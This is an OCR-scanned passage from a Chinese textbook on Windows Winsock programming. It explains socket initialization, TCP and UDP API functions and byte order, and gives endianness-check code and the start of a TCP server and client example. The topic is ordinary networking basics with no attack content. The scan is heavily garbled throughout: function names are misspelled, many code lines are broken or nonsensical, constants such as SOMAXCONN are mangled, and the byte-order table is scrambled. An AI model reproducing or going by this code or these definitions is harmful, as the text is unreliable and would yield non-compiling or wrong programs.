1， Winsock 的 初始 化 与 释放 

在 使 用 Winsock 相关 函数 时 需要 对 Winsock 库 进 行 初始 化 ， 而 在 使 用 完成 后 需要 对 
Winsock 库 进 行 释放 。 完 成 Winsock 库 的 初始 化 和 释放 的 函数 如 下 。 

Winsock 库 的 初始 化 函数 的 定义 : 

int WSRStLartup(WORD wVersionRequested, LPWSADATA lpWSAData); 

该 函数 的 第 1 个 参数 wVersionRequested 是 需要 初始 化 Winsock 库 的 版 本 号 ，Winsock 库 
有 多 个 版 本 , 目前 常用 的 版 本 是 2.2。 第 2 个 参数 lpWSAData 是 一 个 指向 WSADATA 的 指针 。 
该 函数 的 返回 值 为 0， 说 明 函 数 调 用 成 功 。 如 果 函 数 调 用 失败 ， 则 返回 其 他 值 。 在 程序 的 开 
台 处 调用 该 初始 化 函数 ， 在 程序 中 就 可 以 使 用 Winsock 相关 的 所 有 API 函数 。 

Winsock 库 的 释放 函数 的 定义 : 

int WSACleanup (void); 

该 函数 没有 参数 ， 在 程序 的 结束 处 直接 调用 该 函数 ， 即 可 释放 Winsock 库 。 

初始 化 与 释放 Winsock 库 的 代码 示例 如 下 : 

WORD wVersionRequested; 


WSADATA wsaData; 
int erry 


wersionRegquested = MAKEWORD( 2, 2 ); 


err = WSAStartup( wVersionRequested, &wsaData ); 
if (erFE 4s 0 ) 
{ 

return ~—1y 


} 


if ( LOBYTE!( wsaData.wVersion ) 1!= 2 || 
HIBYTE( wsaData.wVersion ) != 2 ) 

{ 
WSsaACcleanup( ) 7 
FretdEn =1» 

} 

yf 

WSACleanup (); 


2. 套 接 字 的 创建 与 关闭 

套 接 字 用 于 根据 指定 的 协议 类 型 来 分 配 一 个 套 接 字 摘 述 符 。 该 描述 符 主 要 用 在 客户 端 和 
服务 器 端 进行 通信 连接 ， 当 套 接 字 使 用 完毕 时 应 该 关闭 套 接 字 以 释放 资源 。 创 建 套 接 字 与 关 
闭 套 接 字 的 函数 为 socketD0 和 closesocket()。 

创建 套 接 字 的 函数 定义 如 下 : 

SOCKET socket (int af, int type, int protocol)s: 

socket() 函 数 共 有 3 个 参数 ， 第 1 个 参数 af 用 来 指定 地 址 族 ， 在 Windows 下 可 以 使 用 的 
参数 值 有 多 个 ， 但 是 真正 可 以 使 用 的 只 有 两 个 ， 分 别 是 AF INET 和 PEF INET。 这 两 个 宏 在 
Winsock2.h 下 的 定义 是 相同 的 ， 分 别 如 下 : 


#define AF INET 2 /* internetwork: YDP, TCP, etc. */ 
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/*# 

* Protocol families, same as address families for now. 
wi 
#define PE_INET AF INET 


以 上 两 个 定义 都 摘自 Winsock2.h 头 文件 。 从 定义 中 可 以 看 出 ，PF INET 和 AF_INET 是 
相同 的 。 看 PF_INET 宏 定 义 上 面 的 注释 ，AF 表示 地 址 族 (Address Family)， 而 PF 表示 协议 
族 (Protocol Family)。 对 于 Windows 来 说 ， 两 者 相同 ; 对 于 Unix/Linux 来 说 ， 两 者 是 不 相同 
的 。 一 般 情况 下 ， 在 调用 socket() 函 数 时 应 该 使 用 PF_INET, 而 在 设置 地 址 时 使 用 AF_INET。 
FP_INET 上 面 的 那 句 注释 ， 同 样 也 是 出 自 Winsock2.h 头 文件 中 。“Protocol families,same as 
address families for now.”， 也 就 是 说 ， 目 前 PF 和 AF 是 相同 的 。 注 释 中 说 目前 是 相同 的 ， 可 
能 这 样 定义 是 为 以 后 预 留 的 , 为 了 保持 良好 的 兼容 性 。 调用 socketO 函 数 时 , 应 该 使 用 PF_INET 
宏 ， 而 尽量 避免 或 不 去 使 用 AF_INET 宏 。 

socketO 函 数 的 第 2 个 参数 type 是 指定 新 套 接 字 描 述 符 的 类 型 。 这 里 可 以 使 用 的 值 通常 有 
3 个 ， 分 别 是 SOCK STREAM、SOCK DGRAM 和 SOCK _RAW， 分 别 表 示 流 套 接 字 、 数 据 
包 套 接 字 和 原始 协议 接口 。 

socket() 函 数 的 第 3 个 参数 protocol 用 来 指定 应 用 程序 所 使 用 的 通信 协议 ， 这 里 可 以 选择 
使 用 IPPROTO_TCP、IPPROTO_UDP、IPPROTO ICMP 等 协议 ， 这 个 参数 的 值 根据 第 2 个 参数 
的 值 进行 选择 。 第 2 个 参数 如 果 使 用 SOCK_ STREAM， 那么 第 3 个 参数 应 该 使 用 IPPROTO _TCP; 
如 果 第 3 个 参数 使 用 了 SOCK DGRAM， 那 么 第 3 个 参数 应 该 使 用 IPPROTO_UDP。 为 了 书写 
简单 ， 如 果 第 2 个 参数 是 SOCK _ STREAM 或 SOCK DGRAM， 那 么 第 3 个 参数 可 以 默认 为 
0。 如 果 第 2 个 参数 指定 的 是 SOCK _ RAW， 那么 第 3 个 参数 就 必须 指定 ， 而 不 能 使 用 0 值 。 

socket(O 函 数 调用 成 功 返回 值 为 一 个 新 的 套 接 字 描述 符 ， 如 果 调 用 失败 ， 则 返回 INVALID 
SOCKET。 调 用 失败 后 ， 想 要 知道 调用 失败 的 原因 ， 那 么 紧 接着 调用 WSAGetLastError() 函 数 
得 到 错误 码 。 





注 : 所 有 的 Winsock 函数 出 错 后 ， 都 可 以 调用 WSAGetLastError() 函 数 得 到 错误 码 ， 但 是 WSAStartup( 
不 能 通过 WSAGetLastError() 得 到 错误 码 ， 因 为 WSAStartup() 未 调用 成 功 ， 不 能 调用 WSAGetlLastError() 
函数 。 

关闭 套 接 字 的 函数 定义 如 下 : 

lint closesocket (SOCKET ‘s); 


closesocket() 函 数 的 参数 是 socketO 函 数 创建 的 套 接 字 描 述 符 。 


-及 ， 注 : 对 于 WSAStartup()/WSACleanup() 和 socket()/closesocket() 这 样 的 函数 ， 最 好 保持 成 对 出 现 。 也 就 是 
说 ， 在 写 完 一 个 函数 时 ， 立 刻写 出 另外 一 个 函数 的 调用 ， 以 免 忘 记 资源 的 释放 。 


3. 面向 连接 协议 的 函数 

前 面 的 部 分 提 到 了 面向 连接 协议 与 非 面 向 连接 协议 所 用 到 的 函数 是 不 相同 的 。 这 里 来 介 
绍 面 向 连接 协议 的 函数 : bind0、1listen0、accept(0)、connectD0、send0 和 recvO。 这 些 函 数 是 常 
用 的 面向 连接 的 函数 ， 它 们 都 是 Winsock 面向 连接 的 最 基本 的 函数 。Winsock 库 的 函数 非常 
多 ， 这 里 只 是 窒 窗 介绍 几 个 而 已 ， 更 多 的 Winsock 函数 需要 在 不 断 的 实践 中 去 学 习 。 下 面 介 
绍 以 上 几 个 函数 的 使 用 方法 。 
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通过 socket() 函 数 可 以 创建 一 个 新 的 套 接 字 描述 符 , 但 是 它 只 是 一 个 描述 符 , 它 为 网 络 的 
一 些 资源 做 准备 。 要 真正 在 网 络 上 进行 通信 ， 需 要 本 地 的 地 址 与 本 地 的 端口 号 信息 。 当 然 ， 
本 地 地 址 与 端口 号 信息 要 去 套 接 字 描 述 符 进行 关联 进行 绑 定 。 在 Winsock 函数 中 , 使 用 bind0) 
函数 完成 套 接 字 与 地 址 端口 信息 的 绑 定 。bind0) 函 数 的 定义 如 下 ; 


int bind(SOCKET s, const struct sockaddr FAR *name, int namelen); 
该 函数 有 3 个 参数 ,第 1 个 参数 s 是 新 创建 的 套 接 字 描述 符 , 也 就 是 用 socket() 函 数 创 建 
的 描述 符 ， 第 2 个 参数 name 是 一 个 sockaddr 的 结构 体 ， 提 供 套 接 字 一 个 地 址 和 端口 信息 ， 
第 3 个 参数 namelen 是 sockaddr 结构 体 的 大 小 。 
其 中 第 2 个 参数 中 的 sockaddr 结构 体 定义 如 下 : 
struct sockaddr { 
ushort sa family; 


char sa data[l4];» 
}? 


该 结构 体 共有 16 字 节 ， 在 该 结构 体 之 前 所 使 用 的 结构 体 为 sockaddr in， 该 结构 体 的 定 
义 如 下 : 


struct sockaddr in { 
short sin family; 
Ushort sin port; 
struct in addr sin addr; 
char sin zerol8]; 


二 
sockaddr 结构 体 是 为 了 保持 各 个 特定 协议 之 间 的 结构 体 兼容 性 而 设计 的 。 为 bindO 函 数 
指定 地 址 和 端口 时 ， 向 sockaddr in 结构 体 填充 相应 的 内 容 ， 而 调用 函数 时 应 该 使 用 sockaddr 
结构 体 。 
在 sockaddr in 结构 体 中 ， 还 有 一 个 结构 体 in_addr， 该 结构 体 在 winsock2.h 中 的 定义 如 下 : 


struct in addr { 
union { 


StruUct { LChar Shlne Bais Da sla Son 
struct. { u short s wl,s w2; } S_ an w;? 
Ulong S_ addr; 


Suns 
}; 


该 结构 体 中 是 一 个 共用 体 S_ un， 包 含 两 个 结构 体 变 量 和 1 个 u_long 类 型 变量 。 一 般 使 
用 的 卫 地 址 是 使 用 点 分 十 进 制 表 示 的 ， 而 in_addr 结构 体 中 却 没有 提供 用 来 保存 点 分 十 进 制 
表示 IP 地 址 的 数据 类 型 ， 这 时 需要 使 用 转换 函数 ， 把 点 分 十 进 制 表示 的 卫 地 址 转换 成 in_addr 
结构 体 可 以 接受 的 类 型 。 这 里 使 用 的 转换 函数 是 inet_addr()， 该 函数 的 定义 如 下 : 


unsigned long inet addr (const char EAR Ep)? 

该 函数 是 将 点 分 十 进 制 表示 IP 地 址 转换 成 unsigned long 类 型 的 数值 。 该 函数 的 参数 cp 
是 指向 点 分 十 进 制 IP 地 址 的 字符 指针 。 同 时 该 函数 有 一 个 逆 函 数 ， 是 将 unsigned long 型 的 
数值 型 下 地 址 转换 为 点 分 十 进 制 的 卫 地 址 字符 串 ， 该 函数 的 定义 如 下 : 


char FAR * inet ntoal(lstruct in addr in); 

sockaddr in 结构 体 中 的 sin_port 表示 端口 ， 这 个 端口 需要 使 用 大 尾 方式 字 节 序 存储 (大 
尾 方 式 和 小 尾 方式 是 两 种 不 同 的 存储 方式 。 为 了 不 影响 内 容 的 结构 ,将 在 后 面 介绍 这 两 种 存储 
方式 ， 这 里 先 讨论 如 何 使 用 大 尾 方式 )。 在 Intel X86 架构 下 ， 数 值 存储 方式 默认 都 是 小 尾 方式 
字 节 序 ， 而 TCP/IP 的 数值 存储 方式 都 是 大 尾 方式 的 字 节 序 。 为 了 实现 方便 的 转换 ，winsock2.h 
中 提供 了 方便 的 函数 ， 即 htons0 和 htonl() 两 个 函数 ， 并 且 提 供 了 它们 的 逆 函 数 ntohs0 和 ntohl0。 
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htons() 和 hton10 函 数 的 定义 分 别 如 下 : 


iH._short htons(u Short hostshort); 
ulong htonl(u long hostliong); 


ntohs() 和 ntohl() 函 数 的 定义 分 别 如 下 : 


ushort ntohs(u short netshort); 
tL long ntohl(u long netlong); 


这 4 个 函数 中 ， 前 两 个 函数 是 将 主机 字 节 序 转换 为 网 络 字 节 序 (host to network)， 后 两 
个 函数 是 将 网 络 字 节 序 转换 为 主机 字 节 序 (network to host)。 在 有 些 架 构 系 统 下 ， 主 机 字 节 
序 和 网 络 字 节 序 是 相同 的 ， 那 样 转换 函数 不 进行 任何 转换 ， 但 是 为 了 代码 的 移植 性 ， 还 是 会 
进行 转换 函数 的 调用 。 


具体 bind() 函 数 的 使 用 方法 如 下 : 
// 创建 套 接 字 
SOCKET sLisent = socket (PF INET, SOCK STREAM, IPPROTO_ TCP); 


// 对 sockaddr in 结构 体 填 充 地 址 、 端 日 等 信息 

struct sockaddr in ServerAddr; 

ServerAdodr.sin family = AF INET; 

ServerAddr.sin addr.Ss un.S addr = inet addr ("10.10.30.12"); 
ServerAddr.sin port = htons (1234); 


// 绑 定 套 接 字 与 地 址 信息 
bind(sLisent, (SOCKADDR *)&ServerAddr, sizeof (ServerAddr)); 


连接 时 ， 服 务 器 操作 系统 接收 到 客户 端的 连接 ， 根 据 网 络 的 配置 情况 会 自动 选择 一 个 IP 地 址 和 客户 端 进行 
通信 。 
当 套 接 字 与 地 址 端口 信息 绑 定 以 后 ， 就 需要 让 端口 进行 监听 ， 当 端口 处 于 监听 状态 以 后 
就 可 以 接受 其 他 主机 的 连接 了 。 监 听 端 口 和 接受 连接 请 求 的 函数 分 别 为 listen() 和 accept()。 
监听 端口 的 函数 定义 如 下 : 


Et hn (Om su acklog)s 
该 函数 有 两 个 参数 ， 第 1 个 参数 s 是 指定 要 监听 的 套 接 字 描述 符 ， 第 2 个 参数 backlog 
是 允许 进入 请 求 连接 队列 的 个 数 ，backlog 的 最 大 值 由 系统 指定 , 在 winsock2.h 中 ,其 最 大 值 


由 SOMAXCONN 表示 ， 该 值 的 定义 如 下 : 
#def£ine SOMAXCONN O07 


接受 连接 请 求 的 函数 定义 如 下 : 

SOCKET accept (SOCKET s, ‘struct sockaddr FAR *addr, int FAR *addrlen); 

该 函数 从 连接 请 求 队列 中 获得 连接 信息 ， 创 建新 的 套 接 字 描述 符 ， 获 取 客 户 端 地 址 。 新 
创建 的 套 接 字 用 于 和 客户 端 进行 通信 ， 在 服务 器 和 客户 端 通信 完成 后 ， 该 套 接 字 也 需要 使 用 
closesocket() 函 数 进行 关闭 ， 以 释放 相应 的 资源 。 该 函数 有 3 个 参数 ， 第 1 个 参数 s 是 处 于 监听 
的 套 接 字 描 述 符 ， 第 2 个 参数 addr 是 一 个 指向 sockaddr 结构 体 的 指针 ， 用 来 返回 客户 端的 地 
址 信息 ， 第 3 个 参数 addrlen 是 一 个 指向 int 型 的 指针 变量 ， 用 来 传 入 sockaddr 结构 体 的 大 小 。 

上 面 介绍 的 是 面向 连接 的 服务 器 端的 函数 ， 完 成 了 一 系列 服务 器 应 有 的 基本 的 动作 ， 具 
体 如 下 。 

(QD bind() 函 数 将 套 接 字 描 述 符 与 地 址 信息 进行 绑 定 。 

@) listen() 函 数 将 绑 定 过 套 接 字 描 述 符 置 于 监听 状态 。 


> 注 : 对 于 服务 器 端的 地 址 可 以 指定 为 INADDR_ANY 宏 ， 表示“ 任意 地 址 ”或 “所 有 地 址 ”。 当 客户 端 发 起 





中 
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@ acceptO 函 数 获取 连接 队列 中 的 连接 信息 ， 创 建新 的 套 接 字 描述 符 ， 以 便 与 客户 端 
通信 。 

面向 连接 的 客户 端 只 需要 完成 与 服务 器 的 连接 这 样 一 个 动作 就 可 以 实现 和 服务 器 端的 通 
信 了 。 创 建 套 接 字 描述 符 后 ， 使 用 connectO) 函 数 就 可 以 完成 与 服务 器 的 连接 。 

connect(0 函 数 的 定义 如 下 : 


int connect (SOCKET s, const struct sockaddr FAR *name, int namelen); 

该 函数 的 作用 是 将 套 接 字 进 行 连接 。 该 函数 有 3 个 参数 ， 第 1 个 参数 s 表示 创建 好 的 套 
接 字 描述 符 ， 第 2 个 参数 name 是 指向 sockaddr 结构 体 的 指针 ，sockaddr 结构 体 中 保存 了 服 
务 器 的 人 * 地 址 和 端口 号 ， 第 3 个 参数 namelen 是 指定 sockaddr 结构 体 的 长 度 。 

当 客户 端 使 用 connect() 函 数 与 服务 器 连接 后 ， 客 户 端 和 服务 器 就 可 以 进行 通信 了 。 通 信 
时 主要 就 是 信息 的 发 送 和 信息 的 接收 。 这 里 介绍 的 函数 有 两 个 ， 分 别 是 send() 和 recv(0)。 

发 送 函 数 send0 的 定义 如 下 : 

i Sent( OKET si 全 生生 让 char FAR bab nn, Len, int Fladge); 

该 函数 有 4 个 参数 , 第 1 个 参数 s 是 套 接 字 描 述 符 ， 该 套 接 字 描 述 符 对 于 服务 器 端 而 言 ， 
使 用 的 是 acceptO 函 数 返回 的 套 接 字 描 述 符 ， 对 于 客户 端 而 言 ， 使 用 的 是 socketO 函 数 创 建 的 
套 接 字 描 述 符 ， 第 2 个 参数 buf 是 发 送 消息 的 缓冲 区 ， 第 3 个 参数 len 是 缓冲 区 的 长 度 ， 第 4 
个 参数 flags 通常 赋 为 0 值 。 

接收 函数 recv() 的 定义 如 下 : 


nt (Fev (Soc S, Char FAR *buf;, intl len, int flags)’; 


该 函数 有 4 个 参数 。 该 函数 的 使 用 方法 与 send() 函 数 的 使 用 方法 相同 , 这 里 不 再 进行 介绍 。 











= 注 : 从 send() 和 recv() 两 个 函数 的 名 称 来 看 分 别 是 发 送 和 接受 的 意思 ， 但 是 实际 上 对 于 数据 的 发 送 和 接收 
依靠 的 是 网 络 协议 来 完成 的 ，send() 函 数 和 recv() 函 数 只 是 完成 了 将 数据 从 网 络 协议 所 使 用 的 缓冲 区 中 进 
行 拷贝 的 一 个 动作 。 

4. 非 面向 连接 协议 的 函数 

在 面向 连接 的 TCP 中 ， 服 务 器 端 将 套 接 字 描 述 符 与 地 址 进行 绑 定 后 ， 需 要 将 端口 进行 监 
听 ， 等 待 接受 客户 端的 连接 请 求 ， 而 在 客户 端 则 需要 连接 服务 器 ， 完 成 这 些 步 又 就 可 以 保证 
面向 连接 的 TCP 的 可 靠 传 输 ， 在 调用 connect() 函 数 的 过 程 中 也 完成 了 TCP 的 “三 次 握手 ” 
的 过 程 。 非 面向 连接 的 UDP 协议 在 开发 上 基本 与 面向 连接 TCP 的 协议 相同 。 在 非 面向 连接 的 
UDP 开发 中 ， 服 务 器 端 不 需要 对 端口 进行 监听 ， 也 就 不 需要 等 待 接受 客户 端的 连接 请 求 ， 而 客 
户 端 也 不 需要 完成 与 服务 器 端的 连接 。 中 间 的 “三 次 握手 ”过 程 也 就 省 略 了 ， 这 样 UDP 相对 
于 TCP 来 讲 就 显得 不 可 靠 了 ， 但 是 在 效率 方面 却 要 快 于 TCP。 

在 非 面向 连接 协议 开发 中 ， 服 务 器 端 不 再 需要 调用 listen()、accept() 函 数 ， 客 户 端 不 再 需 
要 调用 connect() 函 数 。 而 服务 器 和 客户 端的 通信 函数 使 用 sendto0 和 recvfrom() 函 数 即 可 。 

sendto0 函 数 的 定义 如 下 : 


int sendtol( 
SOCKET 8, 
const char FAR “buf, 
17t en, 
dn Lagay 
const, struet sockaddr FAR *toe, 
int tolen 
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该 函数 是 来 用 在 UDP 通信 双方 进行 发 送 数据 的 函数 ， 该 函数 有 6 个 参数 ， 第 1 个 参数 s 
是 套 接 字 描 述 符 ， 第 2 个 参数 buf 是 要 发 送 数据 的 缓冲 区 ， 第 3 个 参数 len 是 指定 第 2 个 参 
数 的 长 度 ， 第 4 个 参数 通常 赋 0 值 ,第 5 个 参数 to 是 一 个 指向 sockaddr 结构 体 的 指针 ， 这 里 
给 出 接收 消息 的 地 址 信息 ， 第 6 个 参数 tolen 是 指定 第 5 个 参数 的 长 度 。 

recvfrom(O) 函 数 的 定义 如 下 : 


int recvfrom!( 
SOCKEBT Ss, 
ahar MARY Ha, 
Ent Len 
nt flagsy 
struct sackaddr FEAR “fronm, 
int FAR *fromlen 
Ns 
该 函数 是 用 来 在 UDP 通信 双方 进行 接收 数据 的 函数 。 该 函数 的 用 法 与 sendto0) 相 同 ， 这 
里 不 再 进行 介绍 。 


sy 注 : sendto() 函 数 和 recvfrom() 函 数 的 功能 与 send() 函 数 和 recv() 函 数 类 似 ， 它 们 都 是 用 于 向 网 络 协 议 缓 
冲 区 进行 数据 复制 的 函数 ， 并 不 是 真正 的 去 完成 数据 的 发 送 和 接收 的 。 


2.1.4” 字 节 顺 序 


前 面 介绍 了 关于 TCP 和 UDP 通信 时 使 用 到 的 一 些 基 本 的 函数 和 数据 结构 ， 其 中 提 到 了 
字 节 序 的 概念 ， 字 节 序 的 存在 是 由 于 不 同 架 构 CPU 在 访问 数据 时 所 采取 的 顺序 不 同 ， 本 小 节 
来 介绍 一 下 关于 字 节 序 的 内 容 。 

在 计算 机 内 存 中 对 数值 的 存储 有 一 定 的 标准 ， 而 该 标准 随 着 系统 架构 的 不 同 而 不 同 。 了 
解 字 节 存 储 顺 序 对 于 逆向 工程 是 一 项 基础 的 知识 ， 在 动态 分 析 程 序 的 时 候 ， 往 往 需 要 观察 内 
存 数据 的 变化 情况 ， 如 果 不 了 解 字 节 存储 顺序 ， 那 么 可 能 会 迷失 在 内 存 的 汪洋 大 海中 而 无 法 
继续 道 向 航行 。 这 里 有 必要 介绍 字 节 序 的 相关 知识 。 

1. 字 节 序 基础 

通常 情况 下 ， 数 值 在 内 存 中 存储 的 方式 有 两 种 ， 一 种 是 大 尾 方式 〈 大 尾 字 节 序 就 是 网 络 
字 节 序 )， 男 一 种 是 小 尾 方式 。 

先 来 看 一 个 简单 的 例子 ， 比 如 0x01020304 这 样 一 个 数值 ， 如果 用 大 尾 方式 存储 ， 其 存储 
方式 为 01 02 03 04， 而 用 小 尾 方式 存储 则 是 04 03 02 01。 这 样 表示 也 许 不 直观 ， 用 表格 的 形 
式 展 示 其 具体 的 区 别 ， 如 表 2-3 所 示 。 


表 2-3 字 节 顺序 的 对 比 表 









小 尾 方式 






























数据 地 址 地 址 
01 00000000H 00000000H 
02 00000001H 00000001H 
03 00000002H 00000002 理 
00000003H 00000003 晶 








从 表 中 可 以 得 到 如 下 结论 。 





中 
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大 尾 存储 方式 : 内 存 高 位 地 址 存放 数据 低位 字 节 数据 ， 内 存 低位 地 址 存放 数据 高 位 字 节 
数据 ; 

小 尾 存 储 方式 ， 内 存 高 位 地 址 存放 数据 高 位 字 节 数据 ， 内 存 低位 地 址 存放 数据 低位 字 节 
数据 。 

2. 主机 字 节 序 与 网 络 字 节 序 

主机 字 节 序 与 网 络 字 节 序 是 相对 的 概念 。 

所 谓 主机 字 节 序 ， 是 指 主机 在 存储 数据 时 的 字 节 顺序 ， 主 机 字 节 序 根据 系统 架构 的 不 同 
而 不 同 。 通 常情 况 下 ，Windows 操作 系统 兼容 的 CPU 为 小 尾 方式 ， 而 UNIX 操作 系统 所 兼容 
的 CPU 多 为 大 尾 方 式 。 因 此 ， 主 机 字 节 序 并 非 固 定 的 字 节 序 ， 需 要 根据 不 同 的 系统 架构 进行 
确定 。 

所 谓 网 络 字 节 序 ， 是 指 网 络 传输 相关 协议 所 规定 的 字 节 传输 顺序 ，TCP/P 所 使 用 的 字 节 
序 为 大 尾 方式 。 

3. 字 节 序 相关 函数 

涉及 字 节 序 常用 的 相关 函数 有 htons0)、htonl0、ntohs0 和 ntohl()。 这 4 个 函数 的 定义 分 
别 如 下 : 

ushort htons (让 short hostsHhort) = 

ulong htonl(u long hostlong); 

u_short ntohs(u short netshort); 

ulong ntohl(u long netlong): 

在 Windows 下 , 使 用 以 上 4 个 转换 函数 会 改变 值 的 大 小 ， 因 为 其 在 内 存 中 的 存放 方式 改 
变 了 。 如 果 在 UNIX 系统 下 ， 使 用 以 上 4 个 转换 函数 是 不 会 发 生 任何 改变 的 。 无 论 是 何 种 系 
统 ， 在 进行 网 络 开 始 时 都 需要 调用 这 些 函 数 进行 转换 ， 因 为 这 样 做 可 以 有 效 的 保证 在 网 络 中 
传输 的 确实 是 网 络 字 节 序 。 

4. 编程 判断 主机 字 节 序 

“编程 判断 主机 字 节 序 ” 是 很 多 杀毒 软件 公司 或 者 是 安全 开发 职位 的 一 道 面试 题 , 因为 这 
题 比 较 基 础 。 通 过 前 面 的 知识 ， 相 信 读 者 能 够 很 容易 地 实现 该 程序 。 这 里 给 出 笔者 自己 对 于 
该 题目 的 实现 方法 。 笔 者 认为 ， 完 成 该 题目 有 两 种 方法 ， 第 1 种 方法 是 “ 取 值 比较 法 ”， 第 2 
种 方法 是 “直接 转换 比较 法 ”。( 注 : 这 两 种 方法 是 笔者 自己 这 么 称呼 的 。 是 否 有 第 3 种 方法 ， 
笔者 暂时 没 想到 ， 难 道 有 两 种 方法 还 不 够 吗 ? ) 

方法 一 : 取 值 比较 法 

所 谓 取 值 比较 法 ， 首 先 定义 一 个 4 字 节 的 十 六 进 制 数 。 因 为 使 用 调试 器 查看 内 存 最 直观 
的 就 是 十 六 进 制 值 ， 所 以 定义 十 六 进 制 数 是 一 个 操作 起 来 比较 直观 的 方法 。 而 后 通过 指针 方式 
取出 这 个 十 六 进 制 数 在 “内 存 ” 中 的 某 一 字 节 ， 最 后 和 实际 数值 中 相对 应 的 数 进行 比较 。 由 于 
字 节 序 的 问题 ， 内 存 中 的 某 字 节 与 实际 数值 中 对 应 的 字 节 可 能 不 同 ， 这 样 就 可 以 确定 字 节 序 了 。 

代码 如 下 : 


int main(int argc, char* argv[]) 


DWORD dwSmallNum = 0x01020304; 
if { *(BYTE *)&dwSsmallNum == 0x04 ) 
{ 
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Brintf("Small Sequence,. \r\n'); 
else 
printf ("Big Sequence,. \r\n"™); 


return 0; 


} 

以 上 代码 中 ， 定 义 了 0x01020304 这 个 十 六 进 制 数 ， 其 在 小 尾 方式 内 存 中 的 存储 顺序 为 
04 03 02 01。 取 *(BYTE *)&dwSmallNum 内 存 中 低地 址 位 的 值 ， 如 果 是 小 尾 方式 的 话 ， 那 么 
低地 址 位 存储 的 值 为 0x04， 如 果 是 大 尾 方式 则 为 0x01。 

方法 二 : 直接 转换 比较 法 

所 谓 直接 转换 比较 法 ， 是 利用 字 节 序 转换 函数 将 所 定义 的 值 进行 转换 ， 然 后 用 转换 后 的 
值 和 原 值 进行 比较 。 如 果 原 值 与 转换 后 的 值 相同 ， 说 明 为 大 尾 方式 ， 否 则 为 小 尾 方式 。 

代码 如 下 : 


int mainl(lint arge, char* argv[]) 


DWORD dwSsmallNum = 0x01020304; 
if ( dwSmallNum == htonl (dwsmallNum) ) 


printf ("Big Sequence. \r\n"); 
elSE 
{ 

printf("Small Sequence. NTNnn) 上 


return 0 


} 

这 种 方法 比较 直接 ， 如 果 转 换 后 的 结果 与 原 值 相等 ， 就 说 明 是 大 尾 方式 ， 因 为 转换 后 的 
结果 是 网 络 字 节 序 ， 网 络 字 节 序 等 同 于 大 尾 方式 。 

关于 字 节 序 的 内 容 读 者 一 定 要 自行 调试 体会 一 下 ， 因 为 在 网 络 开 发 中 只 需要 进行 简单 的 
转换 即 可 ， 不 需要 过 多 的 关心 它 的 细节 。 而 如 果 是 做 逆向 工程 时 ， 在 内 存 中 要 进行 数据 的 查 
找 时 ， 这 时 字 节 序 的 知识 会 使 用 到 了 。 


2.2 Winsock 编程 实例 


关于 TCP 和 UDP 开发 所 需要 的 最 基本 的 函数 已 经 介绍 过 了 ， 这 里 介绍 3 个 实例 来 回顾 
和 梳理 前 面 学 到 的 知识 。 读 者 是 不 是 已 经 急于 动手 进行 练习 了 ? 前 两 个 例子 分 别 给 出 一 个 和 
单 的 TCP 通信 和 一 个 简单 的 UDP 通信。 至 于 第 3 个 例子 …… 读者 还 是 自己 看 吧 。 


2.2.1 基于 TCP 的 通信 


1. 服务 器 端 代码 
回顾 一 下 前 面 的 知识 ， 创 建 一 个 TCP 的 服务 器 端的 程序 需要 调用 的 函数 流程 如 下 : 


WSAStartup()->socket ()->bind()—>listen()->acoept()->send{()/recv()->closesocket () 一 > 
WSACleanup '() 


只 要 依次 调用 上 面 的 函数 就 可 以 完成 一 个 服务 器 端的 程序 了 ， 是 不 是 如 同 搭 积木 一 样 简 
单 ? 服务 器 端的 代码 如 下 : 
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#inciude <stdio.h> 
#inciude <wirnsock2..h> 
#pragma comment (lib, "ws2 32") 


int main'() 
{ 
WSADATA wsaData; 
WSAStartup (MAKEWORD (2, 2), &wsaData); 


// 创建 套 接 字 
SOCKET sLisent = socket (PF INET, SOCK STREAM, TPPROTO TCP); 


// 对 sockaddr_in 结构 体 填充 地 址 、 端 口 等 信息 

struct sockaddr in ServerAddr; 

ServerAddr.sin family = AF_INET; 
ServerAddr.sin addr.S un.S addr = inet addr ("10;10.30.12"); 
ServerAddr .sin port = htons{1234); 


// 绑 定 套 接 字 与 地 址 信息 
bind(sLisent, (SOCKADDR *)&ServerAddr, sizeof (ServerAddr)); 


/7 端口 监听 
listen(sLisent, SOMAXCONN); 


// 获取 连接 请 求 
sockaddr in ClientAddr; 
int nSize = sizeof (ClientaAddr); 


SOCKET sClient = accept (sLisent, (SOCKADDR *)&ClientAddr, &nSize); 
// 输出 客户 端 使 用 的 IP 地 址 和 端口 号 
printf ("ClientIP=%s:$%d\r\n"yinet ntoal(lClientAddr.sin addr); 

ntohs (ClientAddr.sin port)); 


/7/ 发送 消息 

char szMsg[MAXBYTE] = { 0 }; 

lstrepy (szMsg, "hello Client!\r\n"); 

send(sClient, szMsg, strlen(szMsg) + sizeof (char), 0); 


7/ 接收 消息 
recv(sCliertcr szMsg, MAXBYTE, 0); 
printf ("Client Msg : $%5s \r\n", szMsg); 


WSACleanup (); 


return 0: 


} 

这 样 一 个 服务 器 端的 程序 就 完成 了 。 为 了 起 到 演示 的 作用 ， 不 让 多 余 的 东西 影响 流程 的 
清晰 化 , 这 里 没有 对 API 函数 的 返回 值 进行 判断 。 在 实际 的 开发 中 , 为 了 保证 程序 的 健壮 性 ， 
应 该 对 各 函数 的 返回 值 进行 判断 ， 以 免 程 序 中 产生 异常 。 

由 于 代码 中 有 详细 的 注释 ， 并 且 前 面 对 各 Winsock 函数 有 详细 的 介绍 ， 这 里 就 不 再 对 代 
码 进行 解释 了 。 

2. 客户 端 代码 

在 客户 端 中 同样 也 是 调用 前 面 介绍 的 API 函数 进行 搭 积木 式 的 编程 就 可 以 了 。 客 户 端的 
代码 调用 API 的 流程 如 下 : 

WSAStartup()->socket () ->connect ()->send()/recv()->closesocket ()—>WSACleanup'{) 

有 了 调用 的 流程 ， 就 可 以 开始 完成 代码 了 。 客 户 端 的 代码 如 下 : 

#inciude <stdio.h> 


#include <winsock2.h> 
#pragma comment (lib, "ws2 32") 
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int main'() 


{ 


第 WSADATA wsaData; 
2 WSAStartup (MAKEWORD (2, 2), &wsaData); 
a 
// 创建 套 接 字 
黑 SOCKEET SServer = /socket (PE.INET, SOCK STREAM, /TPPROTO TCOP)Y 
客 // 对 sockaddr_in 结构 体 填 充 地 址 、 端 口 等 信息 
网 struct sockaddr in ServerAddr; 
络 ServerAddr.sin family = AF INET; 
编 ServeraAddr .sin'addr.s vn.S addr = net addr("10. 10.30. 12); 
程 ServerAddr.sin port = htons (1234) 7 
// 连接 服务 器 
| connect(sServer, (SOCKADDR *)&ServerAddr, sizeof (ServerAddr)); 


char ‘szMsg [MAXBYTE] = { 0 }; 


/7 接收 消息 
